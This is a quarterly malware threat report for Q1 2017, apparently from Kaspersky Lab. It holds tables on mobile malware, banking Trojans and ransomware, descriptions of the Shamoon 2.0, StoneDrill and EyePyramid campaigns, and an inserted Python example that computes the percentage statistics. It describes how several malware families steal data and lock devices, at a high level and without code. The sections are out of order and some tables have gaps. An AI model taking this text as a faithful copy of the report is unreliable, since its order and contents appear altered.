Second in terms of growth came Trojan-Spy: its share reached 10.27% (+1.83 percentage points). This was caused by an increase in the number of malicious programs belonging to the Trojan-Spy.AndroidOS.SmForw and Trojan-Spy.AndroidOS.SmsThief families, which are designed to steal SMS messages.

In the first quarter, the biggest declines were shown by Adware (7.32%) and Trojan-Dropper (6.99%), whose shares fell by 4.99 and 4.48 percentage points respectively. In addition, the contribution of unwanted RiskTool programs dropped by 2.55 percentage points.

TOP 20 mobile malware programs

Please note that this rating of malicious programs does not include potentially dangerous or unwanted programs such as RiskTool or adware.

In Q1 2017, 14 Trojans that use advertising as their main means of monetization (highlighted in blue in the original table) made it into the TOP 20. Their goal is to deliver as many adverts as possible to the user by various methods, including the installation of new adware. These Trojans may use superuser privileges to conceal themselves in the system application folder, from which they are very difficult to remove.

Rank  Name                                  % of attacked users*
1     DangerousObject.Multi.Generic         70.09
2     (name missing)                        9.35
3     Trojan.AndroidOS.Boogr.gsh            4.51
4     Backdoor.AndroidOS.Ztorg.c            4.18
5     Trojan.AndroidOS.Sivu.c               4.00
6     Backdoor.AndroidOS.Ztorg.a            3.98
7     Trojan.AndroidOS.Hiddad.v             3.89
8     Trojan-Dropper.AndroidOS.Hqwar.i      3.83
9     Trojan.AndroidOS.Hiddad.pac           2.98
10    Trojan.AndroidOS.Triada.pac           2.90
11    Trojan.AndroidOS.Iop.c                2.60
12    Trojan-Banker.AndroidOS.Svpeng.q      2.49
13    (name missing)                        2.34
14    Trojan.AndroidOS.Ztorg.aa             2.03
15    Trojan.AndroidOS.Agent.eb             1.81
16    (name missing)                        1.79
17    Trojan.AndroidOS.Loki.d               1.76
18    Trojan.AndroidOS.Ztorg.ak             1.67
19    (name missing)                        1.59
20    (name missing)                        1.54

* Percentage of unique users attacked by the malware in question, relative to all users of Kaspersky Lab’s mobile security product that were attacked.

First place was occupied by DangerousObject.Multi.Generic (70.09%), the verdict used for malicious programs detected using cloud technologies. Cloud detection works when the antivirus databases contain neither signatures nor heuristics for a malicious program, but the vendor's cloud already holds information about the object. This is essentially how the very latest malware is detected. The Trojan in second place (9.35%) imitates various popular games or programs. Interestingly, once run, it downloads and installs the application it was imitating, and in the process requests administrator rights to resist removal. Its main purpose is the aggressive display of adverts, and its main "audience" is in Russia (86% of attacked users).

Third came Trojan.AndroidOS.Boogr.gsh (4.51%). This verdict is issued for files that our machine-learning system recognized as malicious. Although the system can detect any type of malware, in Q1 2017 the most common detections under this verdict were advertising Trojans that use superuser privileges.

Eighth position in the ranking was occupied by Trojan-Dropper.AndroidOS.Hqwar.i (3.83%), the verdict used for Trojans protected by a particular packer/obfuscator. In most cases, this name hides representatives of the FakeToken and Svpeng mobile banking families.

The ranking also included Trojan-Banker.AndroidOS.Svpeng (2.49%), which was twelfth in the Top 20. This family has been active for three quarters in a row and remains the most popular banking Trojan of Q1 2017. The Trojan in sixteenth place (1.79%), which primarily targets people in India (more than 92% of attacked users), imitates popular programs and games just like the second-placed Trojan, and once run, downloads and installs various applications from the fraudsters' server.

The geography of mobile threats

The geography of attempted mobile malware infections in Q1 2017 (percentage of all users attacked)

TOP 10 countries attacked by mobile malware (ranked by percentage of users attacked)

Rank  Country*      % of users attacked**
1     Iran          47.35
2     Bangladesh    36.25
3     Indonesia     32.97
4     China         32.47
5     Nepal         29.90
6     India         29.09
7     Algeria       28.64
8     Philippines   27.98
9     Nigeria       27.81
10    Ghana         25.85

* We eliminated countries from this rating where the number of users of Kaspersky Lab’s mobile security product is relatively low (under 10,000).
** Percentage of unique users attacked in each country relative to all users of Kaspersky Lab’s mobile security product in the country.

In Q1 2017, Iran was the country with the highest percentage of users attacked by mobile malware – 47.35%. Bangladesh came second: 36.25% of users there encountered a mobile threat at least once during the quarter. It was followed by Indonesia and China; the share of both countries was slightly over 32%.

Russia (11.6%) came 40th in this rating, France (8.1%) 57th, Italy (7.1%) 66th, the US (6.9%) 69th, Germany (6.2%) 72nd and Britain (5.8%) 75th.

The safest countries were Finland (2.7%), Georgia (2.5%) and Japan (1.5%).

In all the Top 20 countries, the same mobile objects are detected: adware, above all the AdWare.AndroidOS.Ewind family, as well as advertising Trojans.

Mobile banking Trojans

Over the reporting period, we detected 32,038 installation packages for mobile banking Trojans, which is 1.1 times as many as in Q4 2016.

Number of installation packages for mobile banking Trojans detected by Kaspersky Lab solutions (Q2 2016 – Q1 2017)

Trojan-Banker.AndroidOS.Svpeng remained the most popular mobile banking Trojan for the third quarter in a row. This family uses phishing windows to steal credit card data and logins and passwords for online banking accounts. In addition, the fraudsters steal money via SMS services, including mobile banking. Svpeng is followed by Trojan-Banker.AndroidOS.Faketoken.z and Trojan-Banker.AndroidOS.Asacub.san. It is worth noting that most attacked users were in Russia.

Geography of mobile banking threats in Q1 2017 (percentage of all users attacked)

TOP 10 countries attacked by mobile banker Trojans (ranked by percentage of users attacked)

Rank  Country*      % of users attacked**
1     Russia        1.64
2     Australia     1.14
3     Turkey        0.81
4     Uzbekistan    0.61
5     Tajikistan    0.48
6     Moldova       0.43
7     Ukraine       0.41
8     Kazakhstan    0.37
9     Kyrgyzstan    0.32
10    Singapore     0.26

* We eliminated countries from this rating where the number of users of Kaspersky Lab’s mobile security product is relatively low (under 10,000).
** Percentage of unique users in each country attacked by mobile banker Trojans, relative to all users of Kaspersky Lab’s mobile security product in the country.

Although the Svpeng family topped the rating of the most popular mobile banking Trojans in the first quarter of 2017, its activity declined compared to the third quarter of 2016: the share of users attacked by these malicious programs in Russia dropped almost twofold, from 3.12% to 1.64%. Russia nevertheless remained the leader of this Top 10.

In second place was Australia (1.14%), where the Trojan-Banker.AndroidOS.Acecard and Trojan-Banker.AndroidOS.Marcher families were the most popular threats. Turkey (0.81%) rounded off the Top 3.

Mobile Ransomware

In Q1 2017, we detected 218,625 mobile Trojan-Ransomware installation packages, 3.5 times more than in the previous quarter.

Number of mobile Trojan-Ransomware installation packages detected by Kaspersky Lab (Q2 2016 – Q1 2017)

In the first half of 2016, the number of mobile ransomware installation packages rose because of the active spread of the Trojan-Ransom.AndroidOS.Fusob family. In the second half of the year, the activity of this family fell, which was reflected in the number of detected installation packages. Growth resumed in the fourth quarter of 2016 and sharply accelerated in Q1 2017. The reason was the Trojan-Ransom.AndroidOS.Congur family: more than 86% of detected mobile ransomware installation packages belonged to it. Congur representatives usually have very simple functionality: they change the system password (PIN), or set one if none was set before, making the device unusable, and then ask the user to contact the fraudsters via the QQ messenger to unblock it. It is worth noting that there are modifications of this Trojan that can take advantage of existing superuser privileges to install their module into the system folder.

Despite this, Trojan-Ransom.AndroidOS.Fusob.h remained the most popular mobile Trojan-Ransomware in the first quarter, accounting for nearly 45% of users attacked by mobile ransomware. Once run, the Trojan requests administrator privileges, collects information about the device, including GPS coordinates and call history, and uploads the data to a malicious server. After that, it may receive a command to block the device.

Geography of mobile Trojan-Ransomware in Q1 2017 (percentage of all users attacked)

TOP 10 countries attacked by mobile Trojan-Ransomware (ranked by percentage of users attacked)

Rank  Country*         % of users attacked**
1     USA              1.23
2     Uzbekistan       0.65
3     Canada           0.56
4     Kazakhstan       0.54
5     Italy            0.44
6     Germany          0.37
7     Korea            0.35
8     Denmark          0.30
9     United Kingdom   0.29
10    Spain            0.28

* We eliminated countries from this ranking where the number of users of Kaspersky Lab’s mobile security product is lower than 10,000.
** Percentage of unique users in each country attacked by mobile Trojan-Ransomware, relative to all users of Kaspersky Lab’s mobile security product in the country.

The US topped the ranking of ten countries attacked by mobile Trojan-Ransomware; the most popular family there was Trojan-Ransom.AndroidOS.Svpeng. These Trojans appeared in 2014 as a modification of the Trojan-Banker.AndroidOS.Svpeng mobile banking family. They demand a ransom of $100-500 from victims to unblock their devices.

In Uzbekistan (0.65%), which came second, most of mobile ransomware attacks involved Trojan-Ransom.AndroidOS.Loluz.a. This is a simple Trojan that blocks operation of a device with its own window and asks the user to contact the fraudsters by phone to unblock it.

Fourth place was occupied by Kazakhstan (0.54%). The main threat to users originated from representatives of the Small mobile Trojan-Ransom family. This is a fairly simple ransomware program that blocks operation of a device by overlaying all the windows on the device with its own window and demanding $10 to unblock it.

In all other countries of the TOP 10, the most popular Trojan-Ransom family was Fusob.

Vulnerable apps exploited by cybercriminals

The first quarter of 2017 was marked by the return, in a diminished form, of the Neutrino exploit kit, which had left the cybercriminal market in the third quarter of 2016. Following Magnitude, Neutrino is changing its distribution model and abandoning wide-scale campaigns to become a "private" exploit kit. Several new players (Nebula, Terror and others) tried to fill the vacant niche but failed: after a brief burst of activity their distribution quickly came to nothing. At the moment, RIG and its modifications remain the most popular and advanced public exploit kit.

The Q1 statistics show an almost 10% decline in the number of attacked users. This is primarily due to the weak exploit kit market, as well as a general decrease in the effectiveness of exploits. Adobe Flash remained the only platform showing growth: although no new vulnerabilities were discovered for it, the number of attacked users grew by 20%. The biggest decrease was in exploits for browsers: only 44% of attacks targeted them, against 54% in the previous quarter.

CVE-2016-0189, CVE-2014-6332 and CVE-2013-2551 remained the most popular vulnerabilities in the first quarter. Also of note were the vulnerabilities in the Chakra engine of Microsoft Edge that were published openly in early 2017. Besides a detailed description of the vulnerabilities, the research included a ready-to-use proof of concept, which shortly after publication was integrated into the Sundown exploit kit and from there moved to Neutrino, Kaixin and others. However, exploitation of these vulnerabilities was not reliable enough, and patches for them had been released back in November 2016 with the MS16-129 update, so they never became widespread and are now almost out of use.

Distribution of exploits used in attacks by the type of application attacked, Q1 2017

In Q1 2017, campaigns involving mass mailings of infected documents were especially popular; Microsoft Office exploits were used to distribute them. Although the share of attacked Office users did not change much, the same users were attacked several times: on average, one attacked user received three malicious documents over the quarter.

The general trend is towards a greater share of social engineering in delivering malware to a potential victim's computer. Campaigns based on infected messages always rely on forcing the user to perform certain actions: unpack a file from a password-protected archive, grant permission to execute macros in a document, and so on. This method is now starting to be applied in browser exploit kits as well. Magnitude, for example, prompts Internet Explorer 11 and Windows 10 users to download a malicious file under the guise of an antivirus update for Microsoft Defender. Some spam campaigns imitate the Google Chrome update page. We believe this trend will continue: such campaigns are easier to maintain and implement, and their level of "penetration" is constantly growing.

Online threats (Web-based attacks)

Online threats in the banking sector

These statistics are based on the detection verdicts of Kaspersky Lab products, received from users who have consented to provide their statistical data. Beginning with the first quarter of 2017, the statistics include malicious programs for ATMs and POS terminals but do not include mobile threats.

Kaspersky Lab solutions blocked attempts to launch one or several malicious programs capable of stealing money via online banking on 288,000 computers in Q1 2017.

Number of users attacked by financial malware, January – March 2017

Geography of attacks

To evaluate and compare the risk of being infected by banking Trojans and ATM and POS-malware worldwide, we calculate the percentage of Kaspersky Lab product users in the country who encountered this type of threat during the reporting period, relative to all users of our products in that country.

Geography of banking malware attacks in Q1 2017 (percentage of attacked users)

TOP 10 countries by percentage of attacked users

Rank  Country*     % of attacked users**
1     Germany      1.70
2     China        1.37
3     Libya        1.12
4     Kazakhstan   1.02
5     Palestine    0.92
6     Togo         0.91
7     Tunisia      0.89
8     Armenia      0.89
9     Venezuela    0.88
10    Taiwan       0.87

These statistics are based on detection verdicts returned by the antivirus module, received from users of Kaspersky Lab products who have consented to provide their statistical data.

*We excluded those countries in which the number of Kaspersky Lab product users is relatively small (under 10,000).

** Unique users whose computers have been targeted by banking Trojan attacks as a percentage of all unique users of Kaspersky Lab products in the country.

In the first quarter of 2017, Germany (1.70%) had the highest proportion of users attacked by banking Trojans. It was followed by China (1.37%). Libya (1.12%) rounded off the Top 3.

As for the other European countries in the Q1 rating, Spain (0.24%) was in 89th position and the UK (0.15%) came 126th.

The TOP 10 banking malware families

The table below shows the TOP 10 malware families used in Q1 2017 to attack online banking users (as a percentage of users attacked):

Rank  Name*                        % of attacked users**
1     Trojan-Spy.Win32.Zbot        45.93
2     Trojan.Win32.Nymaim          29.70
3     Trojan.Win32.Neurevt         3.31
4     Trojan-Banker.Win32.Gozi     3.15
5     Trojan-Spy.Win32.SpyEyes     2.71
6     Backdoor.Win32.ZAccess       2.11
7     Backdoor.Win32.Shiz          1.67
8     Trojan.Multi.Capper          1.67
9     Trojan.Win32.Tinba           1.00
10    Trojan.Win32.Shifu           1.00

*The detection verdicts of Kaspersky Lab products, received from users of Kaspersky Lab products who have consented to provide their statistical data.

** Unique users whose computers have been targeted by the malware in question as a percentage of all users attacked by financial malware.

As in previous quarters, Trojan-Spy.Win32.Zbot (45.93%) topped the rating of the most popular malware families in Q1 2017. Its source code has been publicly available since a leak and is now widely used as an easy-to-use toolkit for stealing user payment data. Unsurprisingly, this malware consistently tops the rating: cybercriminals regularly extend the family with new modifications compiled from the leaked source code that differ only slightly from the original.

Second came Trojan.Win32.Nymaim (29.70%). The first modifications of this family were downloaders that blocked the infected machine using downloaded lockers tailored to each country. Later, new modifications of Trojan.Win32.Nymaim were discovered that included a fragment of Gozi, used by cybercriminals to steal user payment data in online banking systems. In Q1 2017, Gozi (3.15%) itself was in 4th position in the rating.

Trojan.Win32.Neurevt (3.31%) rounded off the Top 3. It is a multifunctional Trojan written in C++. It uses rootkit techniques to conceal its presence in the system, injects its own code into all running processes, blocks the operation of some anti-virus programs, and can monitor for and block the installation of other common Trojans.

Ransomware Trojans

A total of 11 new cryptor families and 55,679 new modifications were detected in Q1 2017.

The number of newly created cryptor modifications, Q2 2016 – Q1 2017

Most of detected modifications belonged to the Cerber family (the Trojan-Ransom.Win32.Zerber verdict). This cryptor, first discovered a year ago, continues to evolve, and we regularly detect its new improved versions.

The number of users attacked by ransomware

In Q1 2017, 240,799 unique KSN users were attacked by cryptors.

Number of unique users attacked by Trojan-Ransom cryptor malware (Q1 2017)

This figure is almost half that of the fourth quarter of 2016, but it should not be read as a receding threat. The difference is most likely due to methodology, and the actual number of incidents is higher: the statistics only reflect signature-based and heuristic detections, whereas most Trojan ransomware is detected by Kaspersky Lab products using behavioral methods that issue a generic verdict, which does not allow the type of malware to be distinguished.

The geography of attacks

Geography of Trojan-Ransom attacks in Q1 2017 (percentage of attacked users)

Top 10 countries attacked by cryptors

Rank  Country*      % of users attacked by cryptors**
1     Italy         1.87%
2     Brazil        1.07%
3     Japan         0.99%
4     Vietnam       0.74%
5     Netherlands   0.73%
6     Cambodia      0.70%
7     Uganda        0.66%
8     Philippines   0.65%
9     Venezuela     0.63%
10    Nigeria       0.60%

* We excluded those countries where the number of Kaspersky Lab product users is relatively small (under 50,000).
** Unique users whose computers have been targeted by ransomware as a percentage of all unique users of Kaspersky Lab products in the country.

Italy, which was not in the Top 10 in the third quarter of 2016, now leads the Q1 ranking (1.87%). Brazil (1.07%), a newcomer to the Top 10, came second. This correlates with our observations of a growing number of Trojan ransomware programs targeting victims in Brazil; one example is Xpan, which we analyzed last year.

Japan (0.99%), which ranked first in the second and third quarters of 2016, moved two places down but still remains at the top of the rating.

Top 10 most widespread cryptor families

Rank  Name               Verdict*                         % of attacked users**
1     Cerber             Trojan-Ransom.Win32.Zerber       18.04%
2     Spora              Trojan-Ransom.Win32.Spora        7.59%
3     Locky              Trojan-Ransom.Win32.Locky        7.35%
4     Sage               Trojan-Ransom.Win32.SageCrypt    3.44%
5     Cryrar/ACCDFISA    Trojan-Ransom.Win32.Cryrar       3.20%
6     Shade              Trojan-Ransom.Win32.Shade        2.82%
7     (generic verdict)  Trojan-Ransom.Win32.Gen          2.37%
8     Crysis/Dharma      Trojan-Ransom.Win32.Crusis       2.30%
9     CryptoWall         Trojan-Ransom.Win32.Cryptodef    2.25%
10    (generic verdict)  Trojan-Ransom.Win32.Snocry       2.16%

* These statistics are based on detection verdicts received from users of Kaspersky Lab products who have consented to provide their statistical data.
** Unique users whose computers have been targeted by a specific Trojan-Ransom family as a percentage of all users of Kaspersky Lab products attacked by Trojan-Ransom malware.

Cerber (18.04%) was the most widespread cryptor by number of attacked users in the first quarter of 2017. This is no surprise, given the huge number of modifications of this cryptor and its active distribution by fraudsters.

Spora (7.59%) was in second place. This new Trojan was first discovered in January 2017 and at the "dawn of its career" only attacked Russian-speaking victims. However, a few weeks after its detection Spora spread around the world, and by the end of the first quarter it had entered the top three most popular cryptors. Third place was occupied by Locky (7.35%), which appeared about a year ago and has recently reduced its activity a little.

Yet another new Trojan is Sage (3.44%). Like Spora, it emerged in the first quarter of 2017 and came fourth in the Q1 rating. The remaining places went to "old acquaintances" that appeared in the reports for previous quarters.

The find of the quarter was the PetrWrap cryptor, which cybercriminals use for targeted attacks on organizations. Statistics show that this type of attack is gaining popularity.

Top 10 countries where online resources are seeded with malware

The following statistics are based on the physical location of the online resources used in attacks and blocked by our antivirus components (web pages containing redirects to exploits, sites containing exploits and other malware, botnet command centers, etc.). Any unique host could be the source of one or more web attacks.

In order to determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established.

In Q1 2017, Kaspersky Lab solutions blocked 479,528,279 attacks launched from web resources located in 191 countries around the world. 79,209,775 unique URLs were recognized as malicious by web antivirus components.

Distribution of web attack sources by country, Q1 2017

The Netherlands (38%) took the lead in the number of web attack sources. The United States (30%), which had topped this rating for several quarters in a row, dropped to second place, although its share remained almost unchanged from the 2016 figures. Germany (9%) rounded off the Top 3.

Russia (4%) and France (3%) were fourth and fifth respectively.

Countries where users faced the greatest risk of online infection

In order to assess the risk of online infection faced by users in different countries, we calculated the percentage of Kaspersky Lab users in each country who encountered detection verdicts on their machines during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers work in different countries.

This rating only includes attacks by malicious programs that fall under the Malware class. The rating does not include web antivirus module detections of potentially dangerous or unwanted programs such as RiskTool or adware.

Rank  Country*     % of users attacked**
1     Algeria      37.67
2     Belarus      33.61
3     Tunisia      32.04
4     Ukraine      31.98
5     Kazakhstan   29.96
6     Azerbaijan   29.95
7     Albania      29.80
8     Bangladesh   29.51
9     Qatar        29.41
10    Armenia      29.02
11    Greece       28.21
12    Moldova      27.46
13    Venezuela    27.37
14    Kyrgyzstan   27.02
15    Vietnam      26.87
16    Russia       26.67
17    Morocco      25.65
18    Sri Lanka    25.42
19    Brazil       25.10
20    Serbia       24.18

These statistics are based on detection verdicts returned by the web antivirus module, received from users of Kaspersky Lab products who have consented to provide their statistical data.

* These calculations excluded countries where the number of Kaspersky Lab users is relatively small (under 10,000 users).
** Unique users whose computers have been targeted by Malware-class attacks as a percentage of all unique users of Kaspersky Lab products in the country.

On average, 20.05% of computers connected to the Internet globally were subjected to at least one Malware-class web attack during the quarter.

Geography of malicious web attacks in Q1 2017 (ranked by percentage of users attacked)

The countries with the safest online surfing environments included Luxembourg (14.4%), Germany (13.9%), Norway (13.83%), South Africa (12.5%), the United States (10.56%), Uganda (10.29%) and Japan (9.18%).

Local threats

Local infection statistics for user computers are a very important indicator: they reflect threats that have penetrated computer systems by infecting files or removable media, or initially got on the computer in an encrypted format (for example, programs integrated in complex installers, encrypted files, etc.).

Data in this section is based on analyzing statistics produced by antivirus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media.

In Q1 2017, Kaspersky Lab's file antivirus detected 174,989,956 unique malicious and potentially unwanted objects.

Countries where users faced the highest risk of local infection

For each country, we calculated the percentage of Kaspersky Lab product users on whose computers the file antivirus was triggered during the quarter. These statistics reflect the level of personal computer infection in different countries.

The rating only includes Malware-class attacks. It does not include file antivirus detections of potentially dangerous or unwanted programs such as RiskTool or adware.

Rank  Country*       % of users attacked**
1     Yemen          54.84
2     Afghanistan    54.27
3     Uzbekistan     53.80
4     Tajikistan     51.32
5     Ethiopia       50.87
6     Djibouti       50.03
7     Algeria        49.38
8     Vietnam        49.15
9     Turkmenistan   48.39
10    Rwanda         47.57
11    Mongolia       47.25
12    Somalia        46.96
13    Syria          46.96
14    Bangladesh     46.64
15    Iraq           46.59
16    Sudan          46.35
17    Nepal          46.19
18    Kazakhstan     46.00
19    Laos           45.39
20    Belarus        43.45

These statistics are based on detection verdicts returned by on-access and on-demand antivirus modules, received from users of Kaspersky Lab products who have consented to provide their statistical data. The data include detections of malicious programs located on users’ computers or on removable media connected to the computers, such as flash drives, camera and phone memory cards, or external hard drives.

* These calculations exclude countries where the number of Kaspersky Lab users is relatively small (under 10,000 users).
** The percentage of unique users in the country with computers that blocked Malware-class local threats as a percentage of all unique users of Kaspersky Lab products.
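The country tables in this report (percentage of a country's product users attacked, with countries below a user threshold dropped) and the family tables (percentage of all attacked users hit by each family) follow one procedure: deduplicate to unique users, keep only Malware-class verdicts, then divide. The following is an added example written for this page, not Kaspersky Lab code: the record layout, the list of non-Malware verdict prefixes, the rule that a family is the first three dot-separated verdict components, and the sample telemetry are all assumptions, and the cut-off is set to 5 users only because the constructed data is tiny (the report uses 10,000 or 50,000).

```python
from __future__ import annotations

from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Detection:
    """One detection event reported by a product component (constructed schema, an assumption)."""
    user_id: str    # stable per-installation identifier; a user is counted once per rating
    country: str
    verdict: str    # e.g. "Trojan-Ransom.Win32.Zerber.xy"
    component: str  # "web" (web antivirus) or "file" (on-access/on-demand scanner)


# Verdict prefixes treated as outside the Malware class (assumed list; the report names RiskTool and adware).
NON_MALWARE_PREFIXES = ("RiskTool.", "AdWare.", "not-a-virus:")


def is_malware_class(verdict: str) -> bool:
    return not verdict.startswith(NON_MALWARE_PREFIXES)


def family(verdict: str) -> str:
    """Strip the variant suffix: Trojan-Ransom.Win32.Zerber.xy -> Trojan-Ransom.Win32.Zerber."""
    return ".".join(verdict.split(".")[:3])


def attacked_share_by_country(detections, users_per_country, min_users, component=None):
    """Percentage of unique users per country with at least one Malware-class detection.

    Countries with fewer than min_users product users are dropped before ranking; a tiny user
    base would otherwise turn a handful of detections into a misleadingly large percentage.
    """
    attacked = defaultdict(set)
    for d in detections:
        if component is not None and d.component != component:
            continue
        if not is_malware_class(d.verdict):
            continue
        attacked[d.country].add(d.user_id)
    rows = []
    for country, total in users_per_country.items():
        if total < min_users:
            continue
        share = 100.0 * len(attacked.get(country, set())) / total
        rows.append((country, round(share, 2)))
    # highest share first; ties broken alphabetically so the order is deterministic
    rows.sort(key=lambda row: (-row[1], row[0]))
    return rows


def family_share(detections):
    """Percentage of attacked users hit by each family, relative to all attacked users.

    A user hit by two families is counted under both, so the column can sum to more than 100%
    (as it does in the report's mobile TOP 20). No country cut-off applies here.
    """
    users_by_family = defaultdict(set)
    all_attacked = set()
    for d in detections:
        if not is_malware_class(d.verdict):
            continue
        users_by_family[family(d.verdict)].add(d.user_id)
        all_attacked.add(d.user_id)
    if not all_attacked:
        return []
    rows = [(fam, round(100.0 * len(users) / len(all_attacked), 2))
            for fam, users in users_by_family.items()]
    rows.sort(key=lambda row: (-row[1], row[0]))
    return rows


# Constructed sample telemetry (not KSN data).
USERS_PER_COUNTRY = {"IT": 20, "BR": 25, "JP": 40, "XX": 3}
SAMPLE_DETECTIONS = [
    Detection("it-001", "IT", "Trojan-Ransom.Win32.Zerber.xy", "file"),
    Detection("it-001", "IT", "Trojan-Ransom.Win32.Zerber.zz", "file"),  # same user, second variant
    Detection("it-002", "IT", "Trojan-Ransom.Win32.Spora.a", "web"),
    Detection("it-003", "IT", "Trojan-Ransom.Win32.Locky.b", "web"),
    Detection("it-004", "IT", "AdWare.Win32.Agent.q", "file"),           # not Malware class: ignored
    Detection("br-001", "BR", "Trojan-Ransom.Win32.Xpan.a", "file"),
    Detection("br-002", "BR", "Trojan-Ransom.Win32.Zerber.xy", "file"),
    Detection("jp-001", "JP", "Trojan-Ransom.Win32.Zerber.xy", "web"),
    Detection("xx-001", "XX", "Trojan-Ransom.Win32.Locky.b", "web"),     # country below the user threshold
]

if __name__ == "__main__":
    print(attacked_share_by_country(SAMPLE_DETECTIONS, USERS_PER_COUNTRY, min_users=5))
    print(attacked_share_by_country(SAMPLE_DETECTIONS, USERS_PER_COUNTRY, min_users=5, component="web"))
    print(family_share(SAMPLE_DETECTIONS))
```

Two things the numbers in the report depend on are visible here: "it-001" is one attacked user however many Zerber variants hit it, and "xx-001" is excluded from the country table but still counts in the family table, which is why family percentages and country percentages cannot be combined arithmetically.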

An average of 23.63% of computers globally faced at least one Malware-class local threat during the quarter. Russia's figure in this rating was 30.51%.

The safest countries in terms of local infection risks were: Poland (14.85%), Singapore (12.21%), Italy (13.30%), France (11.15%), Australia (10.51%), Great Britain (9.08%), Canada (8.66%), the Czech Republic (7.83%), the United States (7.57%), Denmark (6.35%), Japan (6.18%).

IT threat evolution Q1 2017

Fri, 05/19/2017 - 09:26

Overview

Targeted attacks and malware campaigns

More wipers

The aim of most targeted attack campaigns is to steal sensitive data. However, this isn't always the goal. Sometimes attackers erase data instead of, or as well as, trying to gain access to confidential information. We've seen several wiper attacks in recent years. They include Shamoon (also known as 'Disttrack'), believed to have been used to erase data on more than 30,000 computers at Saudi Aramco in 2012, and Dark Seoul, used in the 2013 attacks on South Korean banks and broadcasters.

Shamoon re-appeared in November 2016, targeting organisations in various critical and economic sectors in Saudi Arabia. So far we have observed three waves of attacks using the Shamoon 2.0 malware – activated on 17 November 2016, 29 November 2016 and 23 January 2017.

While the attacks share many similarities with the earlier wave of attacks, they now feature new tools and techniques. The attackers start by obtaining administrator credentials for the target network. Then they build a custom wiper (Shamoon 2.0) which uses the stolen credentials for lateral movement across the organisation. Finally, the wiper activates on a predefined date, leaving the infected computers unusable. The final stage of the attack is completely automated and doesn’t rely on communication with the attacker’s C2 (Command-and-Control) center.

Shamoon 2.0 also includes a ransomware component. This has yet to be used in the wild, so it’s unknown whether the attackers would use this part of the platform for financial gain or for idealistic purposes.

While investigating the Shamoon attacks, we discovered a previously unknown wiper. This malware, which we’ve named StoneDrill, also seems to target organisations in Saudi Arabia. There are similarities in style to Shamoon, with additional features designed to help it evade detection. One of the victims of StoneDrill, observed via the Kaspersky Security Network (KSN) is located in Europe (and operates in the petro-chemicals sector), suggesting that the attackers might be expanding their wiping operations beyond the Middle East.

The most significant difference between the two relates to the wiping process. Shamoon uses a disk driver for direct access to the disk, whereas StoneDrill injects the wiper directly into the victim’s preferred browser.

StoneDrill also shares similarities with the tooling of an APT group known as NewsBeef (also known as 'Charming Kitten'), so called because of its use of the Browser Exploitation Framework (BeEF). These similarities include familiar WinMain and OS signatures, update commands and C2 server names. It isn't known whether the groups behind Shamoon and StoneDrill are the same, or are just aligned in terms of interests and the regions they target; the latter seems most likely to us.

In addition to the wiping module, StoneDrill also includes a backdoor that has been used to run espionage operations against a number of targets.

You can find the full report on Shamoon 2.0 and StoneDrill here. By subscribing to our APT intelligence reports, you can get access to our investigations and discoveries as they happen, including comprehensive technical data.


As we’ve seen before, targeted attacks don’t have to be technically advanced in order to be successful. In January 2016, the arrest of two suspects by Italian police brought to light a series of cyber-attacks that targeted prominent politicians, bankers, freemasons and members of law enforcement agencies.

The malware used in the attacks, called ‘EyePyramid’, was unsophisticated, but nevertheless successful enough to enable the attackers to gain access to all resources on their victims’ computers. The police investigation revealed 100 active victims in the server used to host the malware, but there were indications that the attackers had targeted around 1,600 victims in the last few years. Their victims – located mostly in Italy – included law firms, consultancy services, universities and Vatican cardinals.

The Italian police report didn’t include technical details about how the malware was spread – other than revealing that spear-phishing was used. However, it did identify a number of C2 servers and e-mail addresses used by the attackers to exfiltrate stolen data. Using this information, we created a YARA rule, based on custom e-mail addresses, C2 servers, licences for the custom mailing library used by the attackers and specific IP addresses used in the attack. Then we ran it through our systems to see if it matched any known samples. Our initial YARA rule highlighted two samples, which enabled us to create a more specific YARA rule that identified a further 42 samples in our collection. A further search revealed more details about EyePyramid. The attacks relied on social engineering to trick victims into opening and running infected files attached to the spear-phishing e-mails. The attachments used were ZIP and 7ZIP archives which contained the malware. The attackers used multiple spaces to try to mask the extension of the file – underlining the low level of sophistication of the attacks.

Based on the compilation time-stamps of the samples, which appear to be legitimate, most samples used in the attacks were compiled in 2014-15.

It’s clear that cybercriminals can achieve success even when the malware they use is neither sophisticated nor hard to detect. From the poor OPSEC (operational security) employed in the campaign (for example, using IP addresses associated with their own company and discussing victims in regular phone calls and using WhatsApp), it’s clear that the attackers were amateurs. Nevertheless, they were able to operate for many years and managed to steal gigabytes of data from their victims.

You can read our full report on EyePyramid here.

Breaking the weakest link of the strongest chain

In the middle of 2016 more than 100 Israeli servicemen were targeted by a cunning threat actor. The attack compromised their devices and exfiltrated data to the attackers’ C2 server.

The IDF (Israeli Defense Forces) C4I and the IDF Information Security Department unit, with Kaspersky Lab researchers, obtained a list of the victims – all IDF servicemen serving around the Gaza Strip.

This campaign, which experts believe is still in its early stages, targets Android OS devices. Once the device has been compromised, a process of sophisticated intelligence gathering begins, exploiting the phone’s video and audio capabilities, SMS functions and location.

The attacks are unsophisticated, relying heavily on social engineering techniques. The attackers lure their victims into installing a malicious application, while continuously attempting to acquire confidential information using social networks: the group seems particularly active on Facebook Messenger. Most of the avatars used by the attackers (virtual participants in the social engineering stage of the attack) lure the victims using sexual themes: for example, asking the victim to send explicit photographs and, in return, sending fake photos of teenage girls. The avatars pretend to be from different countries such as Canada, Germany, Switzerland and others.

The victim is tricked into downloading an app from a malicious URL. The app collects data from the victim’s phone, including general information (network operator, GPS location, IMEI, etc.), contacts, browsing history, SMS messages, pictures. The app is also able to record video and audio.

The IDF, which led the research along with Kaspersky Lab researchers, believes that this is just the opening shot of a wider campaign that is designed to capture data on how ground forces are distributed, the tactics and equipment the IDF uses and real-time intelligence.

You can read our full report on this campaign here.

The non-persistence of memory

During an incident response, security specialists hunt for any artefacts that attackers have left behind in the victim’s network. This includes inspecting log files, looking for files on the hard drive, looking at the registry and checking memory.

However, each of these has a different ‘shelf-life’: in other words, the clues will be available to an analyst for a shorter or longer time, depending on where they’re located. Data stored on a hard drive will probably be available to a forensic analyst for a long time: although, as we saw with Duqu 2.0, sophisticated malware might deliberately remove all traces from the hard drive after installation, leaving itself in memory only. This is why memory forensics is critical to the analysis of malware and its functions.

